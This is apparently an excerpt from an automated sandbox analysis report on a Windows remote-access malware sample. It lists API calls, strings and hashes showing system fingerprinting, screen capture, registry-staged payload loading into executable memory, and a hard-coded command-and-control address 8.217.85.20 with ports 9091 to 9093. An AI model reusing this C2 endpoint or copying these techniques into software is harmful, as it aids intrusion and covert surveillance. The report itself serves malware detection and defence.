48877 9755ad RegCloseKey 48875->48877 48878 97553a 48875->48878 48880 9767ff 77 API calls 48876->48880 48877->48881 48879 9767ff 77 API calls 48878->48879 48882 975540 _memset 48879->48882 48883 975758 48880->48883 48884 9755f5 48881->48884 48885 9756f8 48881->48885 48887 97554d RegQueryValueExW 48882->48887 48883->48885 48891 975788 RegCreateKeyW 48883->48891 48886 9755fe VirtualFree 48884->48886 48897 975611 _memset 48884->48897 48888 97721b 743 API calls 48885->48888 48886->48897 48889 9755aa 48887->48889 48890 975569 VirtualAlloc 48887->48890 48894 9757f3 Sleep 48888->48894 48889->48877 48895 9755a5 48890->48895 48892 9757a3 RegDeleteValueW RegSetValueExW 48891->48892 48893 9757ca RegCloseKey 48891->48893 48892->48893 48893->48885 48921 972d10 48894->48921 48895->48889 48896->48851 48898 9767ff 77 API calls 48897->48898 48900 9756b1 48898->48900 48899 9756e6 ctype 48899->48851 48900->48899 48917 9760df 48900->48917 48904 976bad 48903->48904 48907 977d77 __ctrlfp __floor_pentium4 48903->48907 48905 976bde 48904->48905 48904->48907 48912 976c28 48905->48912 48914 977a9b 67 API calls __write_nolock 48905->48914 48906 977de5 __floor_pentium4 48911 977dd2 __ctrlfp 48906->48911 48916 97bc80 67 API calls 6 library calls 48906->48916 48907->48906 48910 977dc2 48907->48910 48907->48911 48915 97bc2b 66 API calls 3 library calls 48910->48915 48911->48858 48912->48858 48914->48912 48915->48911 48916->48911 48918 9760e5 48917->48918 48919 9711b0 70 API calls 48918->48919 48920 98fab1 GetCurrentThreadId 48919->48920 48922 972d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 48921->48922 48923 972d70 48921->48923 48922->48923 48923->48896 48924->48639 48925->48484 48926 98f0df 48933 972c60 WSAStartup CreateEventW InterlockedExchange 48926->48933 48928 976f17 77 API calls 48929 98f0e4 48928->48929 48929->48928 48930 98f7db 48929->48930 48936 975a20 CreateEventW 48930->48936 48934 976815 __write_nolock 5 API calls 48933->48934 48935 972cff 48934->48935 
48935->48929 48937 975a83 48936->48937 48938 975a79 48936->48938 48964 976410 HeapCreate 48937->48964 48970 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48938->48970 48942 975b12 48971 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48942->48971 48943 975b1c CreateEventW 48945 975b55 48943->48945 48946 975b5f CreateEventW 48943->48946 48972 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48945->48972 48948 975b84 CreateEventW 48946->48948 48949 975b7a 48946->48949 48951 975b9f 48948->48951 48952 975ba9 InitializeCriticalSectionAndSpinCount 48948->48952 48973 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48949->48973 48974 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48951->48974 48954 975c77 InitializeCriticalSectionAndSpinCount 48952->48954 48955 975c6d 48952->48955 48957 975c8e 48954->48957 48958 975c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 48954->48958 48975 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48955->48975 48976 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48957->48976 48960 9767ff 77 API calls 48958->48960 48961 975d2b 48960->48961 48962 9767ff 77 API calls 48961->48962 48963 975d3b 48962->48963 48965 976437 48964->48965 48966 976441 48964->48966 48977 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48965->48977 48968 975af2 InitializeCriticalSectionAndSpinCount 48966->48968 48978 976e49 66 API calls 2 library calls 48966->48978 48968->48942 48968->48943 48970->48937 48971->48943 48972->48946 48973->48948 48974->48952 48975->48954 48976->48958 48977->48966 48978->48968 48979 9732e0 6 API calls 48980 973200 Sleep 48981 990254 48980->48981 48982 97474c lstrlenW 48983 98fff8 48982->48983 48984 97638b 48985 971100 70 API calls 48984->48985 48986 976390 48985->48986 48987 98f927 48988 98fb9a 48987->48988 48990 9760df 71 API calls 48988->48990 48993 975ef8 48988->48993 48997 98f997 
48988->48997 48989 98fb9c 48990->48989 48994 975f68 48993->48994 48995 971100 70 API calls 48994->48995 48996 98f9b7 48994->48996 48995->48994 48999 975f68 48997->48999 48998 98f9b7 48999->48998 49000 971100 70 API calls 48999->49000 49000->48999

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • _memset.LIBCMT ref: 02D0546C
                                                                                                  • _memset.LIBCMT ref: 02D05485
                                                                                                  • _memset.LIBCMT ref: 02D05495
                                                                                                  • gethostname.WS2_32(?,00000032), ref: 02D054A3
                                                                                                  • gethostbyname.WS2_32(?), ref: 02D054AD
                                                                                                  • inet_ntoa.WS2_32 ref: 02D054C5
                                                                                                  • _strcat_s.LIBCMT ref: 02D054D8
                                                                                                  • _strcat_s.LIBCMT ref: 02D054F1
                                                                                                  • inet_ntoa.WS2_32 ref: 02D0551A
                                                                                                  • _strcat_s.LIBCMT ref: 02D0552D
                                                                                                  • _strcat_s.LIBCMT ref: 02D05546
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02D05573
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02D05587
                                                                                                  • GetLastInputInfo.USER32(?), ref: 02D0559A
                                                                                                  • GetTickCount.KERNEL32 ref: 02D055A0
                                                                                                  • wsprintfW.USER32 ref: 02D055D5
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02D055E8
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 02D055FC
                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02D05653
                                                                                                  • wsprintfW.USER32 ref: 02D0566C
                                                                                                  • GetForegroundWindow.USER32 ref: 02D05695
                                                                                                  • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 02D056AC
                                                                                                  • lstrlenW.KERNEL32(000008CC), ref: 02D056D3
                                                                                                  • lstrlenW.KERNEL32(00000994), ref: 02D05739
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 02D057AA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D057B1
                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 02D057C2
                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 02D057CD
                                                                                                  • wsprintfW.USER32 ref: 02D05806
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 02D05818
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 02D0582E
                                                                                                  • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 02D0584B
                                                                                                  • CloseHandle.KERNEL32(02D25164), ref: 02D0587F
                                                                                                  • GetTickCount.KERNEL32 ref: 02D058E9
                                                                                                  • __time64.LIBCMT ref: 02D058F8
                                                                                                  • __localtime64.LIBCMT ref: 02D0592F
                                                                                                  • wsprintfW.USER32 ref: 02D05968
                                                                                                  • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 02D0597D
                                                                                                  • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 02D0598C
                                                                                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 02D05999
                                                                                                    • Part of subcall function 02D080F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,753C73E0,00000AD4,00000000), ref: 02D08132
                                                                                                    • Part of subcall function 02D080F0: lstrcmpiW.KERNEL32(?,A:\), ref: 02D08166
                                                                                                    • Part of subcall function 02D080F0: lstrcmpiW.KERNEL32(?,B:\), ref: 02D08176
                                                                                                    • Part of subcall function 02D080F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D081A6
                                                                                                    • Part of subcall function 02D080F0: lstrlenW.KERNEL32(?), ref: 02D081B7
                                                                                                    • Part of subcall function 02D080F0: __wcsnicmp.LIBCMT ref: 02D081CE
                                                                                                    • Part of subcall function 02D080F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 02D08204
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                  • String ID: %d min$1.0$2024.12.28$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                  • API String ID: 1101047656-2702497570
                                                                                                  • Opcode ID: 9d633347d0ac99190f89d9ea83d7b8fe463f196185edc97def8d7d6c76dc6539
                                                                                                  • Instruction ID: 788fc3d98ee7d89f4211edfd6b94c476b5942a138fd647e386725c68a949dc93
                                                                                                  • Opcode Fuzzy Hash: 9d633347d0ac99190f89d9ea83d7b8fe463f196185edc97def8d7d6c76dc6539
                                                                                                  • Instruction Fuzzy Hash: 75F1C4B1940314AFD724DB64EC85FDA73B9EF94700F404558FA0AA7391EA70AE48CF65
                                                                                                  APIs
                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009204AE
                                                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 009204DE
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 009204F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual$InfoNativeSystem
                                                                                                  • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                  • API String ID: 4117132724-2899676511
                                                                                                  • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction ID: a8b1fcab9c4d68184abdd7679326868ad6dce2967b9adf61ac965a4e9c92ea76
                                                                                                  • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction Fuzzy Hash: E1628A315083958FD720CF24D880BABBBE5FFD4704F04492DE9C99B256E774A988CB96

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 02D10542: __fassign.LIBCMT ref: 02D10538
                                                                                                  • Sleep.KERNEL32(00000000), ref: 02D0DF64
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0DF91
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 02D0DFA9
                                                                                                  • wsprintfW.USER32 ref: 02D0DFE0
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(02D075B0), ref: 02D0DFEE
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0E007
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • EnumWindows.USER32(02D05CC0,?), ref: 02D0E19D
                                                                                                  • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D0E1AA
                                                                                                  • EnumWindows.USER32(02D05CC0,?), ref: 02D0E1BE
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 02D0E1F5
                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D0E241
                                                                                                  • Sleep.KERNEL32(00000FA0), ref: 02D0E2C4
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 02D0E2EB
                                                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 02D0E30B
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0E35D
                                                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 02D0E3A4
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 02D0E3D0
                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 02D0E3D7
                                                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 02D0E3E2
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0E400
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 02D0E425
                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 02D0E42C
                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 02D0E446
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0E464
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                  • String ID: %4d.%2d.%2d-%2d:%2d:%2d$8.217.85.20$8.217.85.20$8.217.85.20$8.217.85.20$9091$9092$9092$9093$Console$IpDatespecial

                                                                                                  APIs
                                                                                                  • GetDesktopWindow.USER32 ref: 02D0BC8F
                                                                                                  • GetDC.USER32(00000000), ref: 02D0BC9C
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 02D0BCA2
                                                                                                  • GetDC.USER32(00000000), ref: 02D0BCAD
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 02D0BCBA
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000076), ref: 02D0BCC2
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 02D0BCD3
                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 02D0BCF8
                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 02D0BD26
                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 02D0BD78
                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 02D0BD8D
                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 02D0BDA6
                                                                                                  • SelectObject.GDI32(?,00000000), ref: 02D0BDB4
                                                                                                  • SetStretchBltMode.GDI32(?,00000003), ref: 02D0BDC0
                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 02D0BDCD
                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 02D0BDE0
                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 02D0BE07
                                                                                                  • _memset.LIBCMT ref: 02D0BE7A
                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 02D0BE97
                                                                                                  • _memset.LIBCMT ref: 02D0BEAF
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BF23
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BF2D
                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 02D0BF39
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BFDF
                                                                                                  • DeleteObject.GDI32(?), ref: 02D0BFE9
                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 02D0BFF5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                  • String ID: ($6$gfff$gfff

                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(753C73E0), ref: 02D06A94
                                                                                                  • wsprintfW.USER32 ref: 02D06AA7
                                                                                                    • Part of subcall function 02D06910: GetCurrentProcessId.KERNEL32(7A8163DF,00000000,00000000,753C73E0,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06938
                                                                                                    • Part of subcall function 02D06910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06947
                                                                                                    • Part of subcall function 02D06910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D06960
                                                                                                    • Part of subcall function 02D06910: CloseHandle.KERNEL32(00000000,?,00000000,02D210DB,000000FF,?,02D06AB3,00000000), ref: 02D0696B
                                                                                                  • _memset.LIBCMT ref: 02D06AC2
                                                                                                  • GetVersionExW.KERNEL32(?), ref: 02D06ADB
                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 02D06B12
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02D06B19
                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02D06B3F
                                                                                                  • GetLastError.KERNEL32 ref: 02D06B49
                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 02D06B5D
                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 02D06B85
                                                                                                  • GetSidSubAuthorityCount.ADVAPI32 ref: 02D06B98
                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000), ref: 02D06BA6
                                                                                                  • LocalFree.KERNEL32(?), ref: 02D06BB5
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D06BC2
                                                                                                  • wsprintfW.USER32 ref: 02D06C1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                  • String ID: -N/$NO/$None/%s

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,753C73E0,?,?,?,02D05611,0000035E,000002FA), ref: 02D0749C
                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 02D074B2
                                                                                                  • swprintf.LIBCMT ref: 02D074EF
                                                                                                    • Part of subcall function 02D07410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,02D07523), ref: 02D0743D
                                                                                                    • Part of subcall function 02D07410: GetProcAddress.KERNEL32(00000000), ref: 02D07444
                                                                                                    • Part of subcall function 02D07410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02D07523), ref: 02D07452
                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 02D07547
                                                                                                  • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 02D07563
                                                                                                  • RegCloseKey.KERNEL32(000002FA), ref: 02D07586
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,02D05611,0000035E,000002FA), ref: 02D07598
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                  • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                  APIs
                                                                                                  • GetLogicalDriveStringsW.KERNEL32(000003E8,?,753C73E0,00000AD4,00000000), ref: 02D08132
                                                                                                  • lstrcmpiW.KERNEL32(?,A:\), ref: 02D08166
                                                                                                  • lstrcmpiW.KERNEL32(?,B:\), ref: 02D08176
                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D081A6
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D081B7
                                                                                                  • __wcsnicmp.LIBCMT ref: 02D081CE
                                                                                                  • lstrcpyW.KERNEL32(00000AD4,?), ref: 02D08204
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 02D08228
                                                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 02D08233
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                  • String ID: A:\$B:\
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D05320: InterlockedDecrement.KERNEL32(00000008), ref: 02D0536F
                                                                                                    • Part of subcall function 02D05320: SysFreeString.OLEAUT32(00000000), ref: 02D05384
                                                                                                    • Part of subcall function 02D05320: SysAllocString.OLEAUT32(02D25148), ref: 02D053D5
                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,02D25148,02D069A4,02D25148,00000000,753C73E0), ref: 02D067F4
                                                                                                  • GetLastError.KERNEL32 ref: 02D067FE
                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 02D06816
                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 02D0681D
                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 02D0683F
                                                                                                  • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 02D06871
                                                                                                  • GetLastError.KERNEL32 ref: 02D0687B
                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D068E6
                                                                                                  • HeapFree.KERNEL32(00000000), ref: 02D068ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                  • String ID: NONE_MAPPED
                                                                                                  APIs
                                                                                                  • GetDriveTypeW.KERNEL32(?,76F8DF80,00000000,753C73E0), ref: 02D06C8B
                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 02D06CAA
                                                                                                  • _memset.LIBCMT ref: 02D06CE1
                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 02D06CF4
                                                                                                  • swprintf.LIBCMT ref: 02D06D39
                                                                                                  • swprintf.LIBCMT ref: 02D06D4C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                  • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                  APIs
                                                                                                  • CreateDXGIFactory.DXGI(02D2579C,?,7A8163DF,76F8DF80,00000000,753C73E0), ref: 02D06F4A
                                                                                                  • swprintf.LIBCMT ref: 02D0711E
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D071C7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                  • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                  • API String ID: 3803070356-257307503
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,02D07523), ref: 02D0743D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07444
                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02D07523), ref: 02D07452
                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02D07523), ref: 02D0745A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                  • API String ID: 3433367815-192647395

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 00975507
                                                                                                  • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 0097552E
                                                                                                  • _memset.LIBCMT ref: 00975548
                                                                                                  • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 00975563
                                                                                                  • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00975586
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009755B1
                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00975605
                                                                                                  • _memset.LIBCMT ref: 00975669
                                                                                                  • _memset.LIBCMT ref: 0097568D
                                                                                                  • _memset.LIBCMT ref: 0097569F
                                                                                                  • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00975726
                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 00975799
                                                                                                  • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 009757AC
                                                                                                  • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 009757C4
                                                                                                  • RegCloseKey.KERNEL32(?), ref: 009757CE
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 009757FE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
